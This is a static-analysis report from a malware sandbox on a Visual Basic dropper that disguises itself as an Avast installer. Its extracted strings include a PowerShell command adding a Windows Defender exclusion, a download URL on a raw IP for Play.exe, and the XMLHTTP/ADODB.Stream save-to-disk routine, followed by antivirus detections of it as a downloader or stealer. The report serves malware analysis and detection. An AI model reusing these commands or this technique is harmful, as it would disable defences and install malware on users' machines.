Static | ZeroBOX

PE Compile Time

2023-06-12 21:51:19

PE Imphash

769adc189c80de1183a16ee3ab5f134a

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00000ef8 0x00001000 4.80656848779
.data 0x00002000 0x000002cc 0x00001000 0.0
.rsrc 0x00003000 0x000009b0 0x00001000 2.14411831316

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00003560 0x00000128 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00003560 0x00000128 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00003560 0x00000128 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_GROUP_ICON 0x00003688 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x000036b8 0x000002f8 LANG_ENGLISH SUBLANG_ENGLISH_US data

Imports

Library MSVBVM60.DLL:
0x401000 _CIcos
0x401004 _adj_fptan
0x401008 __vbaFreeVar
0x40100c _adj_fdiv_m64
0x401010 _adj_fprem1
0x401014 _adj_fdiv_m32
0x401018 __vbaLateMemSt
0x40101c _adj_fdiv_m16i
0x401020 __vbaObjSetAddref
0x401024 _adj_fdivr_m16i
0x401028 _CIsin
0x40102c __vbaChkstk
0x401030 __vbaObjVar
0x401034 _adj_fpatan
0x401038 None
0x40103c _CIsqrt
0x401040 __vbaExceptHandler
0x401044 _adj_fprem
0x401048 _adj_fdivr_m64
0x40104c None
0x401050 __vbaFPException
0x401054 _CIlog
0x401058 _adj_fdiv_m32i
0x40105c _adj_fdivr_m32i
0x401060 __vbaStrCopy
0x401064 _adj_fdivr_m32
0x401068 _adj_fdiv_r
0x40106c None
0x401070 __vbaLateMemCall
0x401074 __vbaVarDup
0x401078 __vbaLateMemCallLd
0x40107c _CIatan
0x401080 _allmul
0x401084 _CItan
0x401088 _CIexp
0x40108c __vbaFreeObj
0x401090 __vbaFreeStr

!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
Project1
Project1
Project1
Module1
Project1
VBA6.DLL
__vbaFreeObj
__vbaFreeStr
__vbaVarDup
__vbaLateMemCallLd
__vbaLateMemSt
__vbaStrCopy
__vbaLateMemCall
__vbaFreeVar
__vbaObjVar
__vbaObjSetAddref
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaFreeVar
_adj_fdiv_m64
_adj_fprem1
_adj_fdiv_m32
__vbaLateMemSt
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
_CIsin
__vbaChkstk
__vbaObjVar
_adj_fpatan
_CIsqrt
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
_CIlog
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
_adj_fdivr_m32
_adj_fdiv_r
__vbaLateMemCall
__vbaVarDup
__vbaLateMemCallLd
_CIatan
_allmul
_CItan
_CIexp
__vbaFreeObj
__vbaFreeStr
DigiCert Inc1
www.digicert.com1!0
DigiCert Trusted Root G40
210429000000Z
360428235959Z0i1
DigiCert, Inc.1A0?
8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10
[K]taM?
SA|X=G
http://ocsp.digicert.com0A
5http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
2http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
jj@0HK4
DigiCert, Inc.1A0?
8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10
230116000000Z
260115235959Z0]1
Praha1
Avast Software s.r.o.1
Avast Software s.r.o.0
PEQ#^ub
Mhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Mhttp://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0>
http://www.digicert.com/CPS0
http://ocsp.digicert.com0\
Phttp://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
DigiCert, Inc.1A0?
8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1
http://www.avast.com0/
-]>kX@
~IR"(1L
20230505135821Z
DigiCert, Inc.1;09
2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA0
220921000000Z
331121235959Z0F1
DigiCert1$0"
DigiCert Timestamp 2022 - 20
Ihttp://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
http://ocsp.digicert.com0X
Lhttp://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
(f*^[0
DigiCert Inc1
www.digicert.com1!0
DigiCert Trusted Root G40
220323000000Z
370322235959Z0c1
DigiCert, Inc.1;09
2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA0
http://ocsp.digicert.com0A
5http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
2http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
DigiCert Inc1
www.digicert.com1$0"
DigiCert Assured ID Root CA0
220801000000Z
311109235959Z0b1
DigiCert Inc1
www.digicert.com1!0
DigiCert Trusted Root G40
]J<0"0i3
v=Y]Bv
http://ocsp.digicert.com0C
7http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
~qj#k"
DigiCert, Inc.1;09
2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA
230505135821Z0+
/1(0&0$0"
tse"&i8
@*\AC:\Users\ivan_\Desktop\run file remote\Project1.vbp
WScript.Shell
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"
http://51.79.49.73/crc/Play.exe
C:\Users\Public\Videos\Play.exe
MSXML2.XMLHTTP
ADODB.Stream
responseBody
SaveToFile
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
AVAST Software
Edition
FileDescription
Avast Installer
FileVersion
2.1.99.0
InternalName
microstub
LegalCopyright
Copyright (c) 2023 AVAST Software
OriginalFilename
microstub.exe
ProductName
ProductVersion
2.1.99.0
VarFileInfo
Translation
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
DrWeb Trojan.DownLoader45.58454
MicroWorld-eScan Gen:Variant.Tedy.380556
FireEye Gen:Variant.Tedy.380556
CAT-QuickHeal Clean
McAfee RDN/Generic PWS.y
Malwarebytes RiskWare.Agent.VB
VIPRE Gen:Variant.Tedy.380556
Sangfor Clean
K7AntiVirus Clean
BitDefender Gen:Variant.Tedy.380556
K7GW Clean
Cybereason malicious.8b13e6
BitDefenderTheta Clean
VirIT Clean
Cyren W32/ABRisk.KZBF-6204
Symantec Trojan Horse
Elastic Clean
ESET-NOD32 Clean
APEX Clean
Paloalto Clean
ClamAV Clean
Kaspersky Trojan-Spy.Win32.Stealer.dypr
Alibaba Trojan:Application/Generic.da7d6155
NANO-Antivirus Clean
ViRobot Clean
Emsisoft Gen:Variant.Tedy.380556 (B)
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Artemis!Trojan
Trapmine malicious.moderate.ml.score
CMC Clean
Sophos Mal/Generic-S
Ikarus Clean
GData Win32.Trojan-Downloader.Generic.KSOA9V
Jiangmin Clean
Webroot W32.Trojan.Gen
Google Detected
Avira Clean
MAX malware (ai score=84)
Antiy-AVL Trojan[Spy]/Win32.Stealer
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Tedy.D5CE8C
SUPERAntiSpyware Clean
ZoneAlarm Trojan-Spy.Win32.Stealer.dypr
Microsoft Trojan:Win32/Wacatac.B!ml
Cynet Clean
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
ALYac Gen:Variant.Tedy.380556
TACHYON Clean
DeepInstinct MALICIOUS
Cylance Clean
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002H09FC23
Rising Stealer.Agent!8.C2 (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet W32/PossibleThreat
AVG Win32:RATX-gen [Trj]
Avast Win32:RATX-gen [Trj]
CrowdStrike win/malicious_confidence_60% (W)
No IRMA results available.